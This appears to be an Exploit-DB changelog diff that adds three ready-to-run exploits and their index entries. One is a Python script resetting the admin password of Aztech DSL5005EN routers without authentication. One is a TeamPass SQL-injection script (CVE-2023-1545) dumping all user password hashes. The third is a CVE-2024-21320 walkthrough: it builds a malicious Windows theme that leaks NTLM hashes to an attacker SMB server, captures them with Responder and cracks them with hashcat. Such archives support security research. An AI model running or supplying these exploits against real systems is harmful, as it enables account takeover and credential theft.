DB: 2025-03-23

4 changes to exploits/shellcodes/ghdb

Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)

TeamPass 3.0.0.21 - SQL Injection

Microsoft Windows - NTLM Hash Leak Malicious Windows Theme

exploits/hardware/remote/52093.txt

@@ -0,0 +1,76 @@
+# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
+# Date: 2025-02-26
+# Exploit Author: Amir Hossein Jamshidi
+# Vendor Homepage: https://www.aztech.com
+# Version: DSL5005EN
+# Tested on: Linux
+# CVE: N/A
+
+import requests
+import argparse
+
+print('''
+#################################################################################
+#       aztech DSL5005EN router/modem - admin password change (Unauthenticated) #
+#                   BY: Amir Hossein Jamshidi                                   #
+#               Mail: amirhosseinjamshidi64@gmail.com                           #
+#           github: https://github.com/amirhosseinjamshidi64                    #
+#       Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD             #
+#################################################################################
+''')
+
+def change_password(ip_address, password):
+    """
+    Changes the password of a device at the given IP address.
+
+    Args:
+        ip_address: The IP address of the device (e.g., "192.168.1.1").
+        password:   The new password to set.
+    """
+
+    url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
+    origin = f"http://{ip_address}"
+    referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"
+
+    payload = {
+        "saveFlag": "1",
+        "adminFlag": "1",
+        "SaveBtn": "SAVE",
+        "uiViewTools_Password": password,
+        "uiViewTools_PasswordConfirm": password
+    }
+
+    headers = {
+        "Cache-Control": "max-age=0",
+        "Accept-Language": "en-US,en;q=0.9",
+        "Origin": origin,
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Upgrade-Insecure-Requests": "1",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+        "Referer": referer,
+        "Connection": "keep-alive"
+    }
+
+    try:
+        response = requests.post(url, data=payload, headers=headers, timeout=10)
+
+        if response.status_code == 200:
+            print(f"Password change request to {ip_address} successful!")
+            print(f"Username: admin")
+            print(f"Password: {password}")
+        else:
+            print(f"Request to {ip_address} failed with status code: {response.status_code}")
+            print(f"Response content:\n{response.text}")  # Print response for debugging
+
+    except requests.exceptions.RequestException as e:
+        print(f"An error occurred: {e}")
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Change password of a device.")
+    parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
+    parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
+    args = parser.parse_args()
+
+    change_password(args.ip_address, args.password)

exploits/php/webapps/52094.py

@@ -0,0 +1,137 @@
+# Exploit Title: TeamPass SQL Injection
+# Google Dork: intitle:"Teampass" + inurl:index.php?page=items
+# Date: 02/23/2025
+# Exploit Author: Max Meyer - Rivendell
+# Vendor Homepage: http://www.teampass.net
+# Software Link: https://github.com/nilsteampassnet/TeamPass
+# Version: 2.1.24 and prior
+# Tested on: Windows/Linux
+# CVE : CVE-2023-1545
+
+
+#!/usr/bin/env python3
+import sys
+import json
+import base64
+import logging
+import requests
+from typing import Optional, Dict, Any
+from dataclasses import dataclass
+
+# Configuração de logging
+logging.basicConfig(
+    level=logging.INFO,
+    format='%(asctime)s - %(levelname)s - %(message)s'
+)
+logger = logging.getLogger(__name__)
+
+@dataclass
+class TeamPassExploit:
+    base_url: str
+    arbitrary_hash: str = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'
+
+    def __post_init__(self):
+        self.vulnerable_url = f"{self.base_url}/api/index.php/authorize"
+
+    def check_api_enabled(self) -> bool:
+        """Verifica se a API está habilitada."""
+        try:
+            response = requests.get(self.vulnerable_url)
+            if "API usage is not allowed" in response.text:
+                logger.error("API feature is not enabled")
+                return False
+            return True
+        except requests.RequestException as e:
+            logger.error(f"Erro ao verificar API: {e}")
+            return False
+
+    def execute_sql(self, sql_query: str) -> Optional[str]:
+        """Executa uma query SQL através da vulnerabilidade."""
+        try:
+            inject = f"none' UNION SELECT id, '{self.arbitrary_hash}', ({sql_query}), private_key, " \
+                     "personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' " \
+                     "FROM teampass_users WHERE login='admin"
+
+            data = {
+                "login": inject,
+                "password": "h4ck3d",
+                "apikey": "foo"
+            }
+
+            response = requests.post(
+                self.vulnerable_url,
+                headers={"Content-Type": "application/json"},
+                json=data
+            )
+
+            if not response.ok:
+                logger.error(f"Erro na requisição: {response.status_code}")
+                return None
+
+            token = response.json().get('token')
+            if not token:
+                logger.error("Token não encontrado na resposta")
+                return None
+
+            # Decodifica o token JWT
+            token_parts = token.split('.')
+            if len(token_parts) < 2:
+                logger.error("Token JWT inválido")
+                return None
+
+            payload = base64.b64decode(token_parts[1] + '=' * (-len(token_parts[1]) % 4))
+            return json.loads(payload).get('public_key')
+
+        except Exception as e:
+            logger.error(f"Erro ao executar SQL: {e}")
+            return None
+
+    def get_user_credentials(self) -> Optional[Dict[str, str]]:
+        """Obtém credenciais de todos os usuários."""
+        try:
+            # Obtém número total de usuários
+            user_count = self.execute_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
+            if not user_count or not user_count.isdigit():
+                logger.error("Não foi possível obter o número de usuários")
+                return None
+
+            user_count = int(user_count)
+            logger.info(f"Encontrados {user_count} usuários no sistema")
+
+            credentials = {}
+            for i in range(user_count):
+                username = self.execute_sql(
+                    f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
+                )
+                password = self.execute_sql(
+                    f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
+                )
+
+                if username and password:
+                    credentials[username] = password
+                    logger.info(f"Credenciais obtidas para: {username}")
+
+            return credentials
+
+        except Exception as e:
+            logger.error(f"Erro ao obter credenciais: {e}")
+            return None
+
+def main():
+    if len(sys.argv) < 2:
+        logger.error("Usage: python3 script.py <base-url>")
+        sys.exit(1)
+
+    exploit = TeamPassExploit(sys.argv[1])
+
+    if not exploit.check_api_enabled():
+        sys.exit(1)
+
+    credentials = exploit.get_user_credentials()
+    if credentials:
+        print("\nCredenciais encontradas:")
+        for username, password in credentials.items():
+            print(f"{username}: {password}")
+
+if __name__ == "__main__":
+    main()

exploits/windows/remote/52092.txt

@@ -0,0 +1,74 @@
+# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
+# Date: 02/03/2025
+# Exploit Author: Abinesh Kamal K U
+# CVE : CVE-2024-21320
+# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320
+
+
+## Step 1: Install Responder
+Responder is a tool to capture NTLM hashes over SMB.
+
+git clone https://github.com/lgandx/Responder.git
+cd Responder
+
+Replace `eth0` with your network interface.
+
+
+## Step 2: Create a Malicious Windows Theme File
+
+### Python Script to Generate the Malicious `.theme` File
+
+import os
+
+# Attacker-controlled SMB server IP
+attacker_smb_server = "192.168.1.100"  # Change this to your attacker's IP
+
+# Name of the malicious theme file
+theme_filename = "malicious.theme"
+
+# Malicious .theme file content
+theme_content = f"""
+[Theme]
+DisplayName=Security Update Theme
+
+[Control Panel\Desktop]
+Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg
+
+[VisualStyles]
+Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
+ColorStyle=NormalColor
+Size=NormalSize
+"""
+
+# Write the theme file
+with open(theme_filename, "w") as theme_file:
+    theme_file.write(theme_content)
+
+print(f"[+] Malicious theme file '{theme_filename}' created.")
+
+# Optional: Start a Python HTTP server to serve the malicious theme file
+start_http = input("Start HTTP server to deliver theme file? (y/n):
+").strip().lower()
+if start_http == "y":
+    print("[+] Starting HTTP server on port 8080...")
+    os.system("python3 -m http.server 8080")
+```
+
+
+## Step 3: Deliver & Capture NTLM Hashes
+1. Send the `malicious.theme` file to the target.
+2. Run Responder to capture the NTLM hash:
+
+   sudo python3 Responder.py -I eth0
+
+3. Wait for the victim to open the `.theme` file.
+4. Extract NTLM hash from Responder logs and crack it using hashcat:
+
+   hashcat -m 5600 captured_hashes.txt rockyou.txt
+
+
+--
+Abinesh Kamal K U
+abineshjerry.info
+MTech - Cyber Security Systems & Networks
+Amrita University

files_exploits.csv

@@ -3359,6 +3359,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7845,exploits/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,remote,hardware,,2009-01-20,,1,OSVDB-51658;OSVDB-51657;OSVDB-51656,,,,,
 36428,exploits/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",remote,hardware,,2011-12-07,2015-03-19,1,CVE-2011-5261;OSVDB-77395,,,,,https://www.securityfocus.com/bid/50968/info
 22626,exploits/hardware/remote/22626.txt,"Axis Network Camera 2.x - HTTP Authentication Bypass",2003-05-27,"Juliano Rizzo",remote,hardware,,2003-05-27,2012-11-11,1,CVE-2003-0240;OSVDB-4804,,,,,https://www.securityfocus.com/bid/7652/info
+52093,exploits/hardware/remote/52093.txt,"Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)",2025-03-22,"Amir Hossein Jamshidi",remote,hardware,,2025-03-22,2025-03-22,0,,,,,,
 39314,exploits/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",remote,hardware,,2014-09-15,2017-11-15,1,CVE-2014-6437;OSVDB-111435,,,,,https://www.securityfocus.com/bid/69808/info
 39316,exploits/hardware/remote/39316.pl,"Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",remote,hardware,,2014-09-15,2016-01-25,1,CVE-2014-6436;OSVDB-111433,,,,,https://www.securityfocus.com/bid/69811/info
 36475,exploits/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,remote,hardware,,2011-12-21,2015-03-23,1,,,,,,https://www.securityfocus.com/bid/51156/info
@@ -30794,6 +30795,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33195,exploits/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,webapps,php,,2014-05-05,2014-05-05,0,OSVDB-106638;OSVDB-106637,,,,,
 39559,exploits/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",webapps,php,80,2016-03-14,2016-03-14,1,CVE-2015-7564;CVE-2015-7563;CVE-2015-7562,,,,http://www.exploit-db.comTeamPass-2.1.24.4.tar.gz,
 37087,exploits/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' HTML Injection",2012-04-17,"Marcos Garcia",webapps,php,,2012-04-17,2015-05-22,1,CVE-2012-2234;OSVDB-81197,,,,,https://www.securityfocus.com/bid/53038/info
+52094,exploits/php/webapps/52094.py,"TeamPass 3.0.0.21 - SQL Injection",2025-03-22,"Max Meyer - Rivendell",webapps,php,,2025-03-22,2025-03-22,0,CVE-2023-1545,,,,,
 40140,exploits/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",webapps,php,80,2016-07-21,2016-07-21,0,,,,,http://www.exploit-db.comTeamPass-2.1.26_RC1.tar.gz,
 4582,exploits/php/webapps/4582.txt,"teatro 1.6 - 'basePath' Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",webapps,php,,2007-10-27,,1,OSVDB-40646;CVE-2007-5780,,,,,
 15890,exploits/php/webapps/15890.txt,"Tech Shop Technote 7 - SQL Injection",2011-01-01,MaJ3stY,webapps,php,,2011-01-01,2015-07-12,0,,,,,,
@@ -44431,6 +44433,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2265,exploits/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,remote,windows,445,2006-08-27,,1,CVE-2006-3439;MS06-040,,,,,
 2162,exploits/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",remote,windows,445,2006-08-09,,1,CVE-2006-3439;MS06-040,"Metasploit Framework (MSF)",,,,
 2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,remote,windows,,2006-11-15,,1,CVE-2006-4691;MS06-070,,,,,http://research.eeye.com/html/advisories/published/AD20061114.html
+52092,exploits/windows/remote/52092.txt,"Microsoft Windows - NTLM Hash Leak Malicious Windows Theme",2025-03-22,"Abinesh kamal K U",remote,windows,,2025-03-22,2025-03-22,0,CVE-2024-21320,,,,,
 15266,exploits/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",remote,windows,,2010-10-17,2010-11-01,1,CVE-2010-0231;OSVDB-62253;MS10-012,,,,,http://www.hexale.org/advisories/OCHOA-2010-0209.txt
 19002,exploits/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,remote,windows,,2012-06-06,2012-06-06,1,CVE-2011-3400;OSVDB-77663,"Metasploit Framework (MSF)",,,,
 35055,exploits/windows/remote/35055.py,"Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)",2014-10-25,"Mike Czumak",remote,windows,,2014-10-25,2017-11-16,0,CVE-2014-6352;CVE-2014-4114;OSVDB-113140;MS14-060,,Sandworm,,,